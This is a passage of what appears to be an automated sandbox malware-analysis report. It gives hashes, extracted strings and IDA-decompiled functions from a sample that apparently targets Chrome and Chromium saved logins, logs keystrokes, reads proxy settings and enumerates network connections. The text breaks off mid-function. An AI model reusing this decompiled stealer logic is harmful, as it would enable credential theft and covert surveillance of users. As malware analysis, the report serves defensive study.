                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d49987523794ce8ed4bb060c03339be3ab30899d0a78e50f53fa3c85019847e2
                                                          • Instruction ID: 20f5eab9ee5944eb72183824eaa05ad15d37d7ba85e5585d89411a70b12a9a58
                                                          • Opcode Fuzzy Hash: d49987523794ce8ed4bb060c03339be3ab30899d0a78e50f53fa3c85019847e2
                                                          • Instruction Fuzzy Hash: 0221A7B1409741AED340EF59D18835BFFE0AF84748F80992EF89457251D3B999888F87
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2cc43028804df6e7031d7bdb477b00ee3d25e214831442e515feb843a0defbf8
                                                          • Instruction ID: 3284ca1fbe294b016ba812f83614f168e55cc85ae0225a429d2d4095fe025a78
                                                          • Opcode Fuzzy Hash: 2cc43028804df6e7031d7bdb477b00ee3d25e214831442e515feb843a0defbf8
                                                          • Instruction Fuzzy Hash: 4B111CB05187419EE710AF25C54479BBBE8FF88308F00892EE89897281D77C85458F56
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a1cf67d523e38ab282052ba767e4d7ed1a34ce180a81d7b67339777580b685cf
                                                          • Instruction ID: e4f2ceb084e057a26f4344f627522697bcbae48ed975df61c26fef9454d4b794
                                                          • Opcode Fuzzy Hash: a1cf67d523e38ab282052ba767e4d7ed1a34ce180a81d7b67339777580b685cf
                                                          • Instruction Fuzzy Hash: 26114CB05087059FE310AF26C54876BFBE8EFC4758F00892FE89897281D379D5498F96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 66d348306cd4d6e08c150d2591b3561f405742941a1a59f410c48e2ec4514cc5
                                                          • Instruction ID: 2103f98854d31d6ee21eef8c691fbd4061408f6fabc572c20ce2be922a60f6fa
                                                          • Opcode Fuzzy Hash: 66d348306cd4d6e08c150d2591b3561f405742941a1a59f410c48e2ec4514cc5
                                                          • Instruction Fuzzy Hash: F00140B04083019AD310FF26D54535BFFE4AFC4758F008A1EE49887255D3788689CB87
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2e7b8c339338589e02d34dbb988770e9779c51bc79032b7918c0481683a5381f
                                                          • Instruction ID: c7c63fa6584d291762938b61b036814656b365f8fb5761cd288c2352f27d1738
                                                          • Opcode Fuzzy Hash: 2e7b8c339338589e02d34dbb988770e9779c51bc79032b7918c0481683a5381f
                                                          • Instruction Fuzzy Hash: 6AF01DB45157109FC710EF29C48165BBBE0FF48314F06895DE8C89B316E238D880CB56
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 586562ab7f660d792621f7f3ff03a76942849b748750d6b5247e0080a37609ce
                                                          • Instruction ID: 24ad92727fe000e7c60640d94de1f7f21ee868b5df478abe0a14dc0806b9406b
                                                          • Opcode Fuzzy Hash: 586562ab7f660d792621f7f3ff03a76942849b748750d6b5247e0080a37609ce
                                                          • Instruction Fuzzy Hash: A4D012F0504301AEE710BF51D4057BA7AE8AB41310F41483EA8D086242D77D448D4AA7
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c3194e90da334e6e38a89a9e3cd57681737c8a67fcd2182493c3a531e1f22581
                                                          • Instruction ID: ad06f29d9f34d8de5c37fb948c6dfac14eb5c16bc83129ba4182c5028b8a9bce
                                                          • Opcode Fuzzy Hash: c3194e90da334e6e38a89a9e3cd57681737c8a67fcd2182493c3a531e1f22581
                                                          • Instruction Fuzzy Hash: FED05EB4504701AAD714FF2982453993EE05B40308F84843EDC88C3796E3BD81DD8B1B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e3c58914c79796914ae3652b9338830a73e9f14980a586d20e581d2826090cc4
                                                          • Instruction ID: d679871287b4664fab267dfb904784a560a8627629bc176350aa90e446a3ed10
                                                          • Opcode Fuzzy Hash: e3c58914c79796914ae3652b9338830a73e9f14980a586d20e581d2826090cc4
                                                          • Instruction Fuzzy Hash: D1B01274904B4047C700BF6C854245B7AE87A44304FC409ACF8C4D3303E13C82998A6B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ../nettle-3.5.1/memxor.c$n & 1$n == 1$o
                                                          • API String ID: 0-561580802
                                                          • Opcode ID: c778598c57938beeda3a03c633ed9cdd53ae4a03349816565a6a334ef414175d
                                                          • Instruction ID: 3ee2903d3d2c0e63440c59b9d95d43c21fe2c472ea4d5dc2fd0c85ac53de4ac0
                                                          • Opcode Fuzzy Hash: c778598c57938beeda3a03c633ed9cdd53ae4a03349816565a6a334ef414175d
                                                          • Instruction Fuzzy Hash: BB919E72A083628FC714CF29D48051AFBE2BFD8314F498A2EE8D59B355D735E945CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s\Google\Chrome\User Data\Default\Login Data$%s\Google\Chrome\User Data\Local State$LOCALAPPDATA
                                                          • API String ID: 0-1755387443
                                                          • Opcode ID: 25c53191b8215658669394e1d36e76e7889413c500fa165d3e3269e3eeecf20e
                                                          • Instruction ID: 71a4254163051be47397212b88bd25a6cdd91ad02d264920333697808a15e276
                                                          • Opcode Fuzzy Hash: 25c53191b8215658669394e1d36e76e7889413c500fa165d3e3269e3eeecf20e
                                                          • Instruction Fuzzy Hash: 8E0108F4408311AAC710BF62E44515EBBE0AF80398F51C83EE4D86B282C37C8599CB5A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s\Chromium\User Data\Default\Login Data$%s\Chromium\User Data\Local State$LOCALAPPDATA
                                                          • API String ID: 0-2609310803
                                                          • Opcode ID: 21c6e6d024086da1ece91e8104a1bc99ea1c428e8fdbf93201ad434112c70fdf
                                                          • Instruction ID: 1af54e81e90a1b2e64d1cb376851d72e513c3029c4754ec5bb28f3db25ee8883
                                                          • Opcode Fuzzy Hash: 21c6e6d024086da1ece91e8104a1bc99ea1c428e8fdbf93201ad434112c70fdf
                                                          • Instruction Fuzzy Hash: 8A011AB0408311AAC710BF22E44515EBFE0EF80358F51C83EE4D857282C77C8599CB4B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$@$[%s]$[-Wld]$[904R5 MY0ddR]$[9Cnd aWgR]$[9Cnd us]$[Ctrl+%s]$[D00Wg aWgR]$[D00Wg md85]$[D00Wg r4nI5]$[D00Wg us]$[MY0Wii mWYw]$[P50i+%Y]$[PCs6 mWYw]$[XR6d05]$[adid5d]$[c0dCw]$[cCYw6sCYd]$[j6Y]$[jR5d0]$[jRS]$[qCV]
                                                          • API String ID: 0-287945508
                                                          • Opcode ID: a7201299a71ac298b4eb1a048ca88babafc008e2bbcecdb455fdf88870e38ce2
                                                          • Instruction ID: 165817b8f912d8248abf4659c11c564849502453b133aa370f8f06421a69fc02
                                                          • Opcode Fuzzy Hash: a7201299a71ac298b4eb1a048ca88babafc008e2bbcecdb455fdf88870e38ce2
                                                          • Instruction Fuzzy Hash: 5D815AB0608351DAD720AF59D4C436FBAF4FB81304F51892FE4D566282C3BD49859F6B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 50%
                                                          			E00408417(void* __edx, void* __eflags, char _a4, void* _a12, char _a20, char _a24, void _a36, intOrPtr _a40, intOrPtr _a56, char _a64, char _a65, char _a66, char _a67, char _a68, char _a69, void _a80, void _a88, void _a92, void* _a116, char _a136, char _a180, char _a200) {
                                                          				char _v0;
                                                          				void _v7;
                                                          				void* _v8;
                                                          				void* _v9;
                                                          				void* _v10;
                                                          				void* _v11;
                                                          				void* _v12;
                                                          				void* _v13;
                                                          				void* _v16;
                                                          				char _v24;
                                                          				char _v28;
                                                          				char _v32;
                                                          				intOrPtr _v36;
                                                          				char _v40;
                                                          				char _v44;
                                                          				void* _v48;
                                                          				void* _v52;
                                                          				char _v56;
                                                          				intOrPtr _v64;
                                                          				intOrPtr _v68;
                                                          				void* _v72;
                                                          				intOrPtr* _t121;
                                                          				char _t122;
                                                          				intOrPtr* _t123;
                                                          				intOrPtr* _t131;
                                                          				intOrPtr* _t138;
                                                          				intOrPtr _t150;
                                                          				int _t152;
                                                          				void* _t155;
                                                          				void* _t157;
                                                          				intOrPtr* _t169;
                                                          				intOrPtr* _t173;
                                                          				intOrPtr* _t185;
                                                          				intOrPtr* _t186;
                                                          				intOrPtr* _t187;
                                                          				char _t188;
                                                          				intOrPtr _t189;
                                                          				intOrPtr _t190;
                                                          				void* _t201;
                                                          				void* _t202;
                                                          				intOrPtr* _t221;
                                                          				intOrPtr* _t223;
                                                          				intOrPtr* _t224;
                                                          				intOrPtr* _t225;
                                                          				intOrPtr* _t229;
                                                          				intOrPtr* _t230;
                                                          				intOrPtr _t235;
                                                          				void* _t236;
                                                          				intOrPtr* _t237;
                                                          				intOrPtr* _t242;
                                                          
                                                          				_t201 = __edx;
                                                          				_t237 = _t236 - E0041F3F0(0x110c);
                                                          				_t121 = E004081AA("U4R-55sTsdR");
                                                          				_v16 = "winhttp.dll";
                                                          				L0041F55C();
                                                          				_v16 = _t121;
                                                          				 *_t237 = _t121;
                                                          				L0041F5AC();
                                                          				_push(_t202);
                                                          				_t185 = _t121;
                                                          				_v28 = "U4R-55sEd590WfZ_W0u0i";
                                                          				_t122 = E004081AA(_t202);
                                                          				_v28 = "winhttp.dll";
                                                          				L0041F55C();
                                                          				_v28 = _t122;
                                                          				_v32 = _t122;
                                                          				L0041F5AC();
                                                          				_push(_t201);
                                                          				_push(_t201);
                                                          				if(_t185 != 0 && _t122 != 0) {
                                                          					memcpy( &_a80, L"InternetProxy", 7 << 2);
                                                          					_t191 = 0;
                                                          					_v24 = 0;
                                                          					_v28 = 0;
                                                          					_v32 = 0;
                                                          					_v36 = 1;
                                                          					_v40 =  &_a80;
                                                          					_a4 = 0;
                                                          					_t150 =  *_t185();
                                                          					_t237 = _t237 + 0xc - 0x14;
                                                          					_t189 = _t150;
                                                          					if(_t150 != 0) {
                                                          						_t201 =  &_a24;
                                                          						_t152 = memset( &_a36, _v16, 6 << 2);
                                                          						_a36 = 1;
                                                          						_a40 = 3;
                                                          						_a56 = 1;
                                                          						memset(_t201, _t152, 3 << 2);
                                                          						_t155 = memcpy( &_a88, L"http://www.yandex.com", 0xb << 2);
                                                          						_t242 = _t237 + 0x24;
                                                          						_t191 = 0;
                                                          						_v52 = _t155;
                                                          						_v48 = _t201;
                                                          						 *_t242 = _t189;
                                                          						_v56 =  &_a88;
                                                          						_t157 = _v0();
                                                          						_t237 = _t242 - 0x10;
                                                          						if(_t157 != 0) {
                                                          							memcpy( &_v7, "socks=", 7);
                                                          							_t237 = _t237 + 0xc;
                                                          							_t191 = 0;
                                                          							_v64 = _t190;
                                                          							_v68 = _t235;
                                                          							_v72 =  &_v7;
                                                          							 *_t237 =  &_a180;
                                                          							_t169 = E00408306(0, _t248);
                                                          							if(_t169 != 0) {
                                                          								 *_t237 = 0x8c;
                                                          								L0041F714();
                                                          								_t229 = _t169;
                                                          								_v68 = 0x40;
                                                          								_v72 = _t235;
                                                          								 *_t237 = _t169 + 4;
                                                          								E00412548();
                                                          								 *_t229 = 0;
                                                          								 *_t237 = _t190;
                                                          								 *((intOrPtr*)(_t229 + 0x44)) = E00412666(0);
                                                          								_t173 =  *0x42b304;
                                                          								 *0x42b304 = _t229;
                                                          								 *((intOrPtr*)(_t229 + 0x88)) = _t173;
                                                          								 *_t237 = 0x8c;
                                                          								L0041F714();
                                                          								_t230 = _t173;
                                                          								_v68 = 0x40;
                                                          								_v72 = _t235;
                                                          								 *_t237 = _t173 + 4;
                                                          								E00412548();
                                                          								 *_t230 = 2;
                                                          								 *_t237 = _t190;
                                                          								 *((intOrPtr*)(_t230 + 0x44)) = E00412666(0);
                                                          								 *0x42b304 = _t230;
                                                          								 *((intOrPtr*)(_t230 + 0x88)) =  *0x42b304;
                                                          								_v68 = 4;
                                                          								_v72 = 0x422fa5;
                                                          								 *_t237 = 0x4223dc;
                                                          								E00412548();
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t123 = E004081AA("U4R-55sEd5Xj90WfZPWR84n_W0PQ00dR5u6d0");
                                                          				_v40 = "winhttp.dll";
                                                          				_t186 = _t123;
                                                          				L0041F55C();
                                                          				_push(_t191);
                                                          				_v40 = _t186;
                                                          				_v44 = _t123;
                                                          				L0041F5AC();
                                                          				_push(_t186);
                                                          				_t221 = _t123;
                                                          				_push(_t186);
                                                          				if(_t123 != 0) {
                                                          					_v52 = 0x10;
                                                          					L0041F714();
                                                          					_t187 = _t123;
                                                          					_v52 = _t123;
                                                          					_t123 =  *_t221();
                                                          					_t251 = _t123;
                                                          					_push(_t201);
                                                          					if(_t123 != 0) {
                                                          						_v48 = "%S";
                                                          						_t188 =  &_a20;
                                                          						_v52 = 0x1000;
                                                          						_t233 =  &_a136;
                                                          						_v44 =  *((intOrPtr*)(_t187 + 8));
                                                          						_v56 =  &_a200;
                                                          						E004127A8();
                                                          						E00412588( &_a200, 0x422f70, 0x1000);
                                                          						_v44 = _t188;
                                                          						_v48 =  &_a136;
                                                          						_a64 = 0x68;
                                                          						_a65 = 0x74;
                                                          						_v52 =  &_a64;
                                                          						_a66 = 0x74;
                                                          						_a67 = 0x70;
                                                          						_a68 = 0x3d;
                                                          						_v56 =  &_a200;
                                                          						_a69 = 0;
                                                          						_t131 = E00408306(_t191, _t251);
                                                          						_t252 = _t131;
                                                          						if(_t131 != 0) {
                                                          							_v56 = 0x8c;
                                                          							L0041F714();
                                                          							_t225 = _t131;
                                                          							E00412548(_t131 + 4, _t233, 0x40);
                                                          							 *_t225 = 3;
                                                          							_v56 = _t188;
                                                          							 *((intOrPtr*)(_t225 + 0x44)) = E00412666(_t191);
                                                          							 *0x42b304 = _t225;
                                                          							 *((intOrPtr*)(_t225 + 0x88)) =  *0x42b304;
                                                          							E00412548(0x4223dc, 0x422fa5, 4);
                                                          						}
                                                          						memcpy( &_a92, "socks=", 7);
                                                          						_t237 = _t237 + 0xc;
                                                          						_t123 = E00408306(0, _t252,  &_a200,  &_a92, _t233, _t188);
                                                          						if(_t123 != 0) {
                                                          							_v56 = 0x8c;
                                                          							L0041F714();
                                                          							_t223 = _t123;
                                                          							E00412548(_t123 + 4, _t233, 0x40);
                                                          							 *_t223 = 2;
                                                          							_v56 = _t188;
                                                          							 *((intOrPtr*)(_t223 + 0x44)) = E00412666(0);
                                                          							_t138 =  *0x42b304;
                                                          							 *0x42b304 = _t223;
                                                          							 *((intOrPtr*)(_t223 + 0x88)) = _t138;
                                                          							_v56 = 0x8c;
                                                          							L0041F714();
                                                          							_t224 = _t138;
                                                          							E00412548(_t138 + 4, _t233, 0x40);
                                                          							 *_t224 = 0;
                                                          							_v56 = _t188;
                                                          							 *((intOrPtr*)(_t224 + 0x44)) = E00412666(0);
                                                          							 *0x42b304 = _t224;
                                                          							 *((intOrPtr*)(_t224 + 0x88)) =  *0x42b304;
                                                          							_t123 = E00412548(0x4223dc, 0x422fa5, 4);
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t123;
			}

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 001$=$=$@$InternetProxy$U4R-55sEd590WfZ_W0u0i$U4R-55sEd5Xj90WfZPWR84n_W0PQ00dR5u6d0$U4R-55sTsdR$h$h$http://www.yandex.com$p$p$socks=$t$t$t$t$winhttp.dll
                                                          • API String ID: 0-337019666
                                                          • Opcode ID: 5ae4fd168ad160b687ec016b66311f032f2127d997e6a72b6d5e7ab802d206c0
                                                          • Instruction ID: 129794d27e18b5d836c16bc2de0120feea3297db44a07732c008f05b0d4f5d07
                                                          • Opcode Fuzzy Hash: 5ae4fd168ad160b687ec016b66311f032f2127d997e6a72b6d5e7ab802d206c0
                                                          • Instruction Fuzzy Hash: 09D1F5B0508740AFD710EF25C68479ABBF0BF84744F418C2EE5C897351EBB99989CB5A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_g94e4BgSRN.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: )$A$D$D$G$H$I$I$N$P$R$T
                                                          • API String ID: 0-4026286603
                                                          • Opcode ID: f7e0d66e6706360943002546ce2ae5a522dee07f1adf161bc0e3ce1e523a7a0e
                                                          • Instruction ID: 7b50295ee95f3483ab7dff93a2a89c17451d79e52031df4d4eaf42e24e8d509c
                                                          • Opcode Fuzzy Hash: f7e0d66e6706360943002546ce2ae5a522dee07f1adf161bc0e3ce1e523a7a0e
                                                          • Instruction Fuzzy Hash: 14A1D27110D3809ED311DB69C48438FFFE1ABA6308F44895EE5C89B382D7B99989CB57
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 45%
                                                          			E0040262F(signed int __ecx, signed int __edx, intOrPtr _a4) {
                                                          				char _v608;
                                                          				char _v624;
                                                          				char _v868;
                                                          				char _v876;
                                                          				char _v916;
                                                          				intOrPtr _v936;
                                                          				signed short _v944;
                                                          				signed short _v948;
                                                          				intOrPtr _v964;
                                                          				intOrPtr _v968;
                                                          				signed short _v972;
                                                          				intOrPtr _v976;
                                                          				signed short _v980;
                                                          				char _v988;
                                                          				signed short _v996;
                                                          				signed short _v1000;
                                                          				signed short _v1004;
                                                          				signed short _v1008;
                                                          				signed int _v1010;
                                                          				signed short _v1012;
                                                          				signed short _v1014;
                                                          				intOrPtr _v1016;
                                                          				signed int _v1018;
                                                          				char* _v1020;
                                                          				signed short _v1022;
                                                          				signed short _v1024;
                                                          				signed short _v1028;
                                                          				signed short _v1032;
                                                          				signed short _v1036;
                                                          				signed int _v1040;
                                                          				signed int _v1048;
                                                          				signed short _v1052;
                                                          				signed short _v1056;
                                                          				signed int _v1060;
                                                          				signed int _v1064;
                                                          				signed int _v1068;
                                                          				signed int _v1072;
                                                          				signed int _v1076;
                                                          				char _v1080;
                                                          				signed int _v1084;
                                                          				signed int _v1088;
                                                          				signed int _v1092;
                                                          				signed int _v1096;
                                                          				intOrPtr _t139;
                                                          				intOrPtr _t140;
                                                          				intOrPtr _t141;
                                                          				intOrPtr* _t144;
                                                          				signed short _t147;
                                                          				void* _t150;
                                                          				void* _t162;
                                                          				void* _t163;
                                                          				signed short _t164;
                                                          				void* _t165;
                                                          				signed short _t168;
                                                          				void* _t169;
                                                          				signed int _t170;
                                                          				signed int _t179;
                                                          				signed short _t182;
                                                          				void* _t183;
                                                          				signed short _t186;
                                                          				void* _t187;
                                                          				signed int _t188;
                                                          				void* _t192;
                                                          				signed int _t193;
                                                          				signed int _t206;
                                                          				intOrPtr* _t211;
                                                          				signed int _t213;
                                                          				signed int _t214;
                                                          				signed int _t216;
                                                          				signed int _t217;
                                                          				signed int _t219;
                                                          				signed int _t220;
                                                          				signed int _t223;
                                                          				signed int _t231;
                                                          				signed short* _t232;
                                                          				signed int _t233;
                                                          				signed int _t234;
                                                          				signed int _t235;
                                                          				signed int _t236;
                                                          				signed short* _t237;
                                                          				signed short* _t238;
                                                          				void* _t239;
                                                          				signed int* _t240;
                                                          
                                                          				_t223 = __edx;
                                                          				_t220 = __ecx;
                                                          				_t237 =  &_v1004;
                                                          				E0041236C( &_v944,  &_v944, 0x8000);
                                                          				_t139 = E00407F7A(_t223, "iphlpapi.dll");
                                                          				_v1020 = "psapi.dll";
                                                          				_v976 = _t139;
                                                          				_t140 = E00407F7A(_t223);
                                                          				_v1020 = "kernel32.dll";
                                                          				_v968 = _t140;
                                                          				_t141 = E00407F7A(_t223);
                                                          				_v1020 = "Ed5jf5dRSdSqYsqCVid";
                                                          				_v964 = _t141;
                                                          				_t144 = E00407F8E(_t223, _v976, E004081AA());
                                                          				_v1020 = "Ed5jf5dRSdSuSsqCVid";
                                                          				_t211 = _t144;
                                                          				_t147 = E00407F8E(_t223, _v976, E004081AA());
                                                          				_v1020 = "Ed590WYd66XlCnd_4idLCldD";
                                                          				_v972 = _t147;
                                                          				_t150 = E00407F8E(_t223, _v968, E004081AA());
                                                          				if(_t150 == 0) {
                                                          					_t150 = E00407F8E(_t223, _v964, E004081AA("Ed590WYd66XlCnd_4idLCldD"));
                                                          				}
                                                          				_t224 = _t223 & 0xffffff00 | _t211 == 0x00000000;
                                                          				_t222 = _t220 & 0xffffff00 | _v972 == 0x00000000 | _t223 & 0xffffff00 | _t211 == 0x00000000;
                                                          				if((_t220 & 0xffffff00 | _v972 == 0x00000000 | _t223 & 0xffffff00 | _t211 == 0x00000000) != 0 || _t150 == 0) {
                                                          					L24:
                                                          					_t212 =  &_v944;
                                                          					if(_v936 == 0) {
                                                          						_v1008 = 0;
                                                          						_v1012 = 0;
                                                          						_v1016 = 0xe5;
                                                          					} else {
                                                          						_v1008 = E00412540( &_v944);
                                                          						_v1016 = 0xe4;
                                                          						_v1012 = _v944;
                                                          					}
                                                          					E00405D7D(_t224, _a4);
                                                          					E004123B1(_t212);
                                                          					E00407FAB(_v976);
                                                          					E00407FAB(_v968);
                                                          					return E00407FAB(_v964);
                                                          				} else {
                                                          					_t232 =  &_v948;
                                                          					_v948 = 0;
                                                          					_v1000 = 0;
                                                          					_v1004 = 5;
                                                          					_v1008 = 2;
                                                          					_v1012 = 1;
                                                          					_v1016 = _t232;
                                                          					_v1020 = 0;
                                                          					_t162 =  *_t211();
                                                          					_t238 = _t237 - 0x18;
                                                          					if(_t162 != 0x7a) {
                                                          						L14:
                                                          						_t213 =  &_v972;
                                                          						_v972 = 0;
                                                          						_v1024 = 0;
                                                          						_v1028 = 1;
                                                          						_v1032 = 2;
                                                          						_v1036 = 1;
                                                          						_v1040 = _t213;
                                                          						 *_t238 = 0;
                                                          						_t163 = _v996();
                                                          						_t239 = _t238 - 0x18;
                                                          						if(_t163 != 0x7a) {
                                                          							goto L24;
                                                          						}
                                                          						_t164 = _v996;
                                                          						_v1068 = _t164;
                                                          						L0041F714();
                                                          						_v1000 = _t164;
                                                          						if(_t164 == 0) {
                                                          							goto L24;
                                                          						}
                                                          						_v1048 = 0;
                                                          						_v1052 = 1;
                                                          						_v1056 = 2;
                                                          						_v1060 = 1;
                                                          						_v1064 = _t213;
                                                          						_v1068 = _t164;
                                                          						_t165 = _v1020();
                                                          						_t240 = _t239 - 0x18;
                                                          						if(_t165 != 0) {
                                                          							L22:
                                                          							if(_v1024 != 0) {
                                                          								E00407F59( &_v1024);
                                                          							}
                                                          							goto L24;
                                                          						}
                                                          						_t233 = 0;
                                                          						_t235 =  &_v876;
                                                          						while(1) {
                                                          							_t168 = _v1024;
                                                          							if(_t233 >=  *_t168) {
                                                          								goto L22;
                                                          							}
                                                          							_t214 = _t233 * 0xc;
                                                          							_t169 = _t168 + _t214;
                                                          							_t170 =  *(_t169 + 8) & 0x0000ffff;
                                                          							_v1092 = _t170;
                                                          							L0041F914();
                                                          							_v1096 =  *((intOrPtr*)(_t169 + 4));
                                                          							_v1048 = _t170;
                                                          							L0041F924();
                                                          							_v1088 = _t170;
                                                          							_v1092 = 0x422c01;
                                                          							_v1096 = 0x40;
                                                          							_v1084 = _v1052 & 0x0000ffff;
                                                          							 *_t240 =  &_v1012;
                                                          							E004127A8();
                                                          							_v1092 = 0x104;
                                                          							_v1096 = _t235;
                                                          							 *_t240 =  *(_v1032 + _t214 + 0xc);
                                                          							E00402570(_t222, _t224, __eflags, _t222, _t224);
                                                          							_v1080 =  &_v1012;
                                                          							_t216 =  &_v624;
                                                          							_v1088 = _t235;
                                                          							_v1092 = 0x422c07;
                                                          							_v1096 = 0x204;
                                                          							 *_t240 = _t216;
                                                          							_v1084 =  *((intOrPtr*)(_t214 + _v1032 + 0xc));
                                                          							_t179 = E004127A8();
                                                          							__eflags = _t179;
                                                          							if(_t179 > 0) {
                                                          								_v1092 = _t179;
                                                          								_v1096 = _t216;
                                                          								 *_t240 =  &_v1024;
                                                          								E00412458( &_v1024, _t224);
                                                          							}
                                                          							_t233 = _t233 + 1;
                                                          							__eflags = _t233;
                                                          						}
                                                          						goto L22;
                                                          					}
                                                          					_t182 = _v972;
                                                          					 *_t238 = _t182;
                                                          					L0041F714();
                                                          					_v980 = _t182;
                                                          					if(_t182 == 0) {
                                                          						goto L24;
                                                          					}
                                                          					_v1024 = 0;
                                                          					_v1028 = 5;
                                                          					_v1032 = 2;
                                                          					_v1036 = 1;
                                                          					_v1040 = _t232;
                                                          					 *_t238 = _t182;
                                                          					_t183 =  *_t211();
                                                          					_t238 = _t238 - 0x18;
                                                          					if(_t183 != 0) {
                                                          						L12:
                                                          						if(_v1004 != 0) {
                                                          							E00407F59( &_v1004);
                                                          						}
                                                          						goto L14;
                                                          					}
                                                          					_t234 = 0;
                                                          					_t236 =  &_v916;
                                                          					while(1) {
                                                          						_t186 = _v1004;
                                                          						if(_t234 >=  *_t186) {
                                                          							goto L12;
                                                          						}
                                                          						_t217 = _t234 * 0x18;
                                                          						_t187 = _t186 + _t217;
                                                          						_t188 =  *(_t187 + 0xc) & 0x0000ffff;
                                                          						_v1068 = _t188;
                                                          						L0041F914();
                                                          						_v1072 =  *((intOrPtr*)(_t187 + 8));
